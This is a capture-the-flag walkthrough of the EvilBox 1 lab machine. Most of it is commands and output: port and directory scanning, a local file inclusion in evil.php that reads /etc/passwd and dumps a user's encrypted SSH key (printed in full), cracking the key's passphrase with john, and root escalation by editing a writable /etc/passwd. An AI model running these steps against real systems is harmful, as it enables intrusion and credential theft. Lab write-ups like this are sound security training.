EvilBox 1
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon evilbox.vuln
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Whoops Team Views CVE-2022-23242 WildZarek
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 07:29 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:29
Completed NSE at 07:29, 0.00s elapsed
Initiating ARP Ping Scan at 07:29
Scanning evilbox.vuln (10.0.2.10) [1 port]
Completed ARP Ping Scan at 07:29, 0.01s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:29
Scanning evilbox.vuln (10.0.2.10) [65535 ports]
Discovered open port 22/tcp on 10.0.2.10
Discovered open port 80/tcp on 10.0.2.10
Completed SYN Stealth Scan at 07:29, 1.28s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.10.
Initiating NSE at 07:29
Completed NSE at 07:29, 0.00s elapsed
Nmap scan report for evilbox.vuln (10.0.2.10)
Host is up (0.000063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:A0:CE:A8 (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 07:29
Completed NSE at 07:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.45 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[+] [fuzzin server]
http://evilbox.vuln [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[10.0.2.10], Title[Apache2 Debian Default Page: It works]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jul 14 07:29:32 2022
URL_BASE: http://evilbox.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://evilbox.vuln:80/ ----
+ http://evilbox.vuln:80/index.html (CODE:200|SIZE:10701)
+ http://evilbox.vuln:80/robots.txt (CODE:200|SIZE:12)
==> DIRECTORY: http://evilbox.vuln:80/secret/
+ http://evilbox.vuln:80/server-status (CODE:403|SIZE:277)
-----------------
END_TIME: Thu Jul 14 07:29:34 2022
DOWNLOADED: 4612 - FOUND: 3
recon two tcp ports open 22 for ssh and 80 for http
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -w /usr/share/dirb/wordlists/common.txt -z list,php-txt -t 500 --hc=404 http://evilbox.vuln/secret/FUZZ.FUZ2Z
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://evilbox.vuln/secret/FUZZ.FUZ2Z
Total requests: 9228
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 403 9 L 28 W 277 Ch "php"
000000026: 403 9 L 28 W 277 Ch ".htpasswd - txt"
000000025: 403 9 L 28 W 277 Ch ".htpasswd - php"
000000024: 403 9 L 28 W 277 Ch ".htaccess - txt"
000000023: 403 9 L 28 W 277 Ch ".htaccess - php"
000000021: 403 9 L 28 W 277 Ch ".hta - php"
000000022: 403 9 L 28 W 277 Ch ".hta - txt"
000003025: 200 0 L 0 W 0 Ch "evil - php"
Total time: 4.601635
Processed Requests: 9228
Filtered Requests: 9220
Requests/sec.: 2005.373
After fuzzin secret dir we found evil.php
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -w /usr/share/dirb/wordlists/common.txt -t 500 --hh=0 'http://evilbox.vuln/secret/evil.php?FUZZ=/etc/passwd'
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://evilbox.vuln/secret/evil.php?FUZZ=/etc/passwd
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000947: 200 26 L 38 W 1398 Ch "command"
Total time: 0
Processed Requests: 4614
Filtered Requests: 4613
Requests/sec.: 0
More fuzzin and get noticed there's LFI
┌──(root@ghost)-[/home/ghost]
└─# lfienum.py "http://evilbox.vuln/secret/evil.php?command="
...
[SSH ID_RSA KEY]
mowree key from http://evilbox.vuln/secret/evil.php?command=/home/mowree/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
After using lfienum.py we obtain a lot information and automatically lfienum drops user ssh keys id_rsa, maybe authorized ones, but they are encrypted
┌──(root@ghost)-[/home/ghost]
└─# /usr/share/john/ssh2john.py key > hashed
┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hashed
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (key)
1g 0:00:00:00 DONE (2022-07-14 08:37) 50.00g/s 62100p/s 62100c/s 62100C/s unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Finally we got id_rsa protected password
┌──(root@ghost)-[/home/ghost]
└─# chmod 600 key
┌──(root@ghost)-[/home/ghost]
└─# ssh mowree@evilbox.vuln -i key
Enter passphrase for key 'key':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
We are on the machine as mowree user account, time to privesc
mowree@EvilBoxOne:~$ find / -writable 2>/dev/null
...
/home/mowree/.profile
/home/mowree/.bash_history
/home/mowree/.ssh
/home/mowree/.ssh/id_rsa
/home/mowree/.ssh/authorized_keys
/home/mowree/.bashrc
/home/mowree/.bash_logout
/home/mowree/.local
/home/mowree/.local/share
/home/mowree/.local/share/nano
/etc/passwd
/dev/fb0
/dev/dri/by-path/pci-0000:00:02.0-card
/dev/dri/card0
/dev/cdrom
/dev/dvd
/dev/sg1
/dev/snd/by-path/pci-0000:00:05.0
/dev/snd/controlC0
/dev/snd/pcmC0D1c
/dev/snd/pcmC0D0c
...
Seems /etc/passwd abuse is possible, let's create a password to place inside root tag
mowree@EvilBoxOne:~$ openssl passwd -1
Password:
Verifying - Password:
$1$rBTHP1/l$Rd.2X0LWBHxYpDot./JmG/
mowree@EvilBoxOne:~$ nano /etc/passwd
root:$1$rBTHP1/l$Rd.2X0LWBHxYpDot./JmG/:0:0:root:/root:/bin/bash
mowree@EvilBoxOne:~$ su root
Contraseña:
root@EvilBoxOne:/home/mowree# cat /root/root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM